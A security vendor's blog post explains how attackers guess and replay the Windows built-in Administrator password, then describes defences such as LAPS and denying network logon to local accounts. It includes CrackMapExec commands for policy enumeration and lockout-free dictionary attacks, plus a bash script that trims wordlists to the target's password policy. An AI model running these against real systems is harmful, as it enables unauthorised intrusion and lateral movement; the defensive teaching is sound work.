So far in this series, we’ve looked at how attackers target weak domain passwords in Active Directory. To complete the story, we need to look beyond domain accounts and understand how local accounts on Windows servers and desktops are attacked. This post focuses on the most important local account: Administrator. The built-in Administrator account exists on every Windows system and has full control over it, which includes the ability to dump credentials from memory and use them in pass-the-hash and pass-the-ticket attacks against domain accounts.
The Administrator account is vulnerable to password attacks for two reasons:
1. The built-in Administrator account (RID 500) is exempt from the account lockout policy, so an attacker can guess its password indefinitely.
2. Its password is frequently identical across many systems, so one guessed password can be replayed against the rest of the environment.
Let’s walk through a typical attack against the Administrator account using our favorite application CrackMapExec.
Because the built-in Administrator account is exempt from account lockout, you can make an unlimited number of guesses against it. Using password lists such as the SecLists collections, you can assemble a custom list of well-known passwords to guess against the Administrator account.
To build a more targeted list, enumerate the password policy on the target systems. It reports the minimum password length and whether complexity is enforced, so you can trim the list to passwords that could actually have been set.
Issuing this command against a member server or workstation returns the local account policy:
cme smb [hostname or list] -u [username] -p [password] --pass-pol
Once you have your password list, the following command runs an online dictionary attack against the local Administrator account, trying each password in turn until one is accepted:
cme smb [hostname or list] -u Administrator -d builtin -p [password list]
In the output I clearly exceeded the local account lockout threshold of 10 bad passwords, yet the account was never locked out and its password was recovered in plain text.
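Putting the two steps together, as an added example that is not from the original post: a small bash script that applies the minimum length and complexity values reported by --pass-pol to a raw wordlist, so that only passwords the policy would have allowed are sent to cme. The complexity rule it implements is Microsoft's documented one (three of four character classes, no account name in the password); treating the classes as four ASCII classes rather than the five Windows checks, the constructed six-line wordlist, and the host and file names are assumptions of the example.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: keep only the passwords in a
# wordlist that the target's policy (as reported by `cme --pass-pol`) would
# have allowed, so the online guessing run wastes no attempts.

# meets_policy PASSWORD MIN_LENGTH COMPLEXITY(0|1) [ACCOUNT_NAME]
# Exit 0 when PASSWORD is at least MIN_LENGTH characters and, if COMPLEXITY
# is 1, satisfies Windows' "Password must meet complexity requirements":
# characters from at least three of the four ASCII classes (uppercase,
# lowercase, digit, non-alphanumeric) and no occurrence of the account name.
# Windows also counts other Unicode letters as a class; restricting the
# check to ASCII is an assumption of this example.
meets_policy() {
  pw=$1; min=$2; complex=$3; acct=${4:-Administrator}
  [ "${#pw}" -ge "$min" ] || return 1
  [ "$complex" -eq 1 ] || return 0
  classes=0
  case $pw in *[[:upper:]]*) classes=$((classes + 1)) ;; esac
  case $pw in *[[:lower:]]*) classes=$((classes + 1)) ;; esac
  case $pw in *[[:digit:]]*) classes=$((classes + 1)) ;; esac
  case $pw in *[![:alnum:]]*) classes=$((classes + 1)) ;; esac
  [ "$classes" -ge 3 ] || return 1
  # The account name must not appear in the password (case-insensitive).
  lpw=$(printf '%s' "$pw" | tr '[:upper:]' '[:lower:]')
  lacct=$(printf '%s' "$acct" | tr '[:upper:]' '[:lower:]')
  case $lpw in *"$lacct"*) return 1 ;; esac
  return 0
}

# filter_wordlist MIN_LENGTH COMPLEXITY  (reads candidates on stdin, writes
# the survivors to stdout, one per line)
filter_wordlist() {
  while IFS= read -r candidate || [ -n "$candidate" ]; do
    if meets_policy "$candidate" "$1" "$2"; then
      printf '%s\n' "$candidate"
    fi
  done
  return 0
}

# Demonstration on a constructed six-line wordlist against a policy of
# minimum length 8 with complexity enabled. On a real engagement, pipe in a
# SecLists file (e.g. 10-million-password-list-top-1000.txt) and use the
# numbers --pass-pol reported for the target.
printf '%s\n' password Password1 P@ssw0rd 'administrator1!' 'Welcome123!' Summer2019 \
  | filter_wordlist 8 1
# Prints Password1, P@ssw0rd, Welcome123! and Summer2019. Save that output
# to a file and point cme at it (host list name assumed):
#   cme smb hosts.txt -u Administrator -d builtin -p viable.txt
```

"password" is dropped for having a single character class and "administrator1!" for containing the account name, even though both meet the length; the remaining four are the only guesses worth spending against this policy.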
The other common abuse of the local Administrator account is replaying its password (or its NTLM hash) against other systems in the environment. This usually works because setting and managing a different Administrator password on every endpoint is hard, so the same password ends up on many machines. Attackers therefore move laterally from one compromised machine to a large number of them with very little effort.
Fortunately there are several effective ways to protect against password attacks on local Administrator accounts. One is to disable the built-in account and create a new administrative account in its place: only the built-in RID 500 account is exempt from lockout, so the same guessing attack against the replacement account locks it out like any other local account. Alternatively, Microsoft provides the Local Administrator Password Solution (LAPS), which sets a random Administrator password on each domain-joined computer and stores it in Active Directory, where read access is controlled by ACL. This guarantees passwords are long, complex and unique per machine, which makes guessing impractical and removes the password reuse that the replay attack depends on.
Another useful protection is the Local account and member of Administrators group security principal (S-1-5-114), available natively from Windows 8.1 and Server 2012 R2 and backported to Windows 7 and Server 2008 R2 by KB2871997. Adding it to the Deny access to this computer from the network and Deny log on through Remote Desktop Services user rights prevents local administrator credentials from being used over the network, which stops the password replay attack against local accounts.
Previous blog posts in the series:
Jeff Warren is Stealthbits’ General Manager of Products. Jeff has held multiple roles within the Technical Product Management group since joining the organization in 2010, initially building Stealthbits’ SharePoint management offerings before shifting focus to the organization’s Data Access Governance solution portfolio as a whole. Before joining Stealthbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development.
With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering Stealthbits’ high quality, innovative solutions.
Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware.